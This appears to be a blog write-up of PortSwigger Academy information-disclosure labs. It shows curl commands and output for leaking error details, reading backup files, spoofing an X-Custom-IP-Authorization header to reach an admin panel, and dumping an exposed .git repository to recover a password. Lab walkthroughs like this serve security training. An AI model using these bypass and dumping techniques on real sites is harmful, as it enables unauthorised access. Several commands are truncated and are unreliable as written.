Information Disclosure - [PortSwigger]

Cover Image for Information Disclosure - [PortSwigger]

Table of Contents


    In this post there is a compilation of every apprentice and practitioner lab related to the *Information Disclosure topic from PortSwigger Academy.

    Information disclosure in error messages [Apprentice]

    Checking a product appears the parameter productId which contains a number as a value. So, by changing the number to letters, we obtain an error that contains the framework's version.

    kali@kali:~$ curl -skq https://<LAB_DOMAIN>
    Internal Server Error: java.lang.NumberFormatException: For input string: "sdadfads"
            at java.base/java.lang.NumberFormatException.forInputString(
            at java.base/java.lang.Integer.parseInt(
            at java.base/java.lang.Integer.parseInt(
            at lab.l.e.e.w.E(Unknown Source)
            at lab.p.v.p.p.L(Unknown Source)
            at lab.p.v.z.a.q.a(Unknown Source)
            at lab.p.v.z.u.lambda$handleSubRequest$0(Unknown Source)
            at h.v.b.n.lambda$null$3(Unknown Source)
            at h.v.b.n.G(Unknown Source)
            at h.v.b.n.lambda$uncheckedFunction$4(Unknown Source)
            at java.base/
            at lab.p.v.z.u.c(Unknown Source)
            at lab.a.p.e.o.z(Unknown Source)
            at lab.p.v.l.z(Unknown Source)
            at lab.a.p.e.h.s(Unknown Source)
            at lab.a.p.e.h.C(Unknown Source)
            at h.v.b.n.lambda$null$3(Unknown Source)
            at h.v.b.n.G(Unknown Source)
            at h.v.b.n.lambda$uncheckedFunction$4(Unknown Source)
            at lab.a.g1.C(Unknown Source)
            at lab.a.p.e.h.x(Unknown Source)
            at lab.a.p.l.n.q(Unknown Source)
            at lab.a.p.o.M(Unknown Source)
            at lab.a.y.o(Unknown Source)
            at lab.a.y.J(Unknown Source)
            at lab.a.y.V(Unknown Source)
            at h.v.x.e.i.C(Unknown Source)
            at h.v.x.e.i.r(Unknown Source)
            at Source)
            at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(
            at java.base/java.util.concurrent.ThreadPoolExecutor$
            at java.base/
    Apache Struts 2 2.3.31

    Information disclosure on debug page [Apprentice]

    To pass this lab we need to find a specific comment. This can be found by reviewing the HTML on any site page or using the engagement tools Discover content or Find comments. The path you are looking for is /cgi-bin/phpinfo.php.

    Finally, you only have to access that path and look for the "SECRET_KEY" value.

    Source code disclosure via backup files [Apprentice]

    Looking at /robots.txt there is a path named /backup.

    kali@kali:~$ curl https://<LAB_DOMAIN>
    User-agent: *
    Disallow: /backup

    Looking inside the file, the password can be obtained.

    kali@kali:~$ curl https://<LAB_DOMAIN>
            ConnectionBuilder connectionBuilder = ConnectionBuilder.from(

    Authentication bypass via information disclosure [Apprentice]

    Using the TRACE method for any request on the web site, a custom header appears X-Custom-IP-Authorization.

    kali@kali:~$ curl -b "session=<WIENER_COOKIE>" -X TRACE https://<LAB_DOMAIN>
    TRACE /admin HTTP/1.1
    Host: <LAB_DOMAIN>
    User-Agent: curl/7.81.0
    Accept: */*
    Cookie: session=AkRcO4SkiO40hpgg27zfvgZxXeJT2FBJ
    X-Custom-IP-Authorization: [REDACTED]

    The value corresponds to our public IP.

    kali@kali:~$ curl

    Trying to access the /admin panel, appears the message " Admin interface only available to local users ".

    So, by intercepting the request and adding the X-Custom-IP-Authorization header with the localhost IP, it is possible to bypass the IP filter and delete the user Carlos.

    kali@kali:~$ curl -sqD - -b "session=<WIENER_COOKIE>" -H "X-Custom-IP-Authorization:" https://<LAB_DOMAIN>  | head
    HTTP/1.1 302 Found
    Location: /admin
    Connection: close
    Content-Length: 0

    Information disclosure in version control history [Practitioner]

    There is a .git repository.

    kali@kali:~$ curl https://<LAB_DOMAIN>
            <title>Index of /.git</title>
                table { margin: 1em; }
                td { padding: 0.2em; }
            <h1>Index of /.git</h1>
                <tr><td><a href='/.git/branches/'>&lt;branches&gt;</a></td><td></td></tr>
                <tr><td><a href='/.git/description'>description</a></td><td>73B</td></tr>
                <tr><td><a href='/.git/hooks/'>&lt;hooks&gt;</a></td><td></td></tr>
                <tr><td><a href='/.git/info/'>&lt;info&gt;</a></td><td></td></tr>
                <tr><td><a href='/.git/refs/'>&lt;refs&gt;</a></td><td></td></tr>
                <tr><td><a href='/.git/HEAD'>HEAD</a></td><td>23B</td></tr>
                <tr><td><a href='/.git/config'>config</a></td><td>152B</td></tr>
                <tr><td><a href='/.git/objects/'>&lt;objects&gt;</a></td><td></td></tr>
                <tr><td><a href='/.git/index'>index</a></td><td>225B</td></tr>
                <tr><td><a href='/.git/COMMIT_EDITMSG'>COMMIT_EDITMSG</a></td><td>34B</td></tr>
                <tr><td><a href='/.git/logs/'>&lt;logs&gt;</a></td><td></td></tr>

    You can use git-dumper to download the git repository.

    kali@kali:~$ mkcd /tmp/Repo
    kali@kali:/tmp/Repo$ git-dumper https://<LAB_DOMAIN> 

    Then, look at the commits.

    kali@kali:/tmp/Repo$ cat admin.conf 
    kali@kali:/tmp/Repo$ git log --oneline
    b3415ee (HEAD -> master) Remove admin password from config
    6431464 Add skeleton admin panel

    Because there is nothing on the current version, let's change to the first commit.

    kali@kali:/tmp/Repo$ git checkout 6431464
    Note: switching to '6431464'.
    You are in 'detached HEAD' state. You can look around, make experimental
    changes and commit them, and you can discard any commits you make in this
    state without impacting any branches by switching back to a branch.
    If you want to create a new branch to retain commits you create, you may
    do so (now or later) by using -c with the switch command. Example:
      git switch -c <new-branch-name>
    Or undo this operation with:
      git switch -
    Turn off this advice by setting config variable advice.detachedHead to false
    HEAD is now at 6431464 Add skeleton admin panel

    After that, you can retrieve the Administrator's password to access the admin panel.

    kali@kali:/tmp/Repo$ cat admin.conf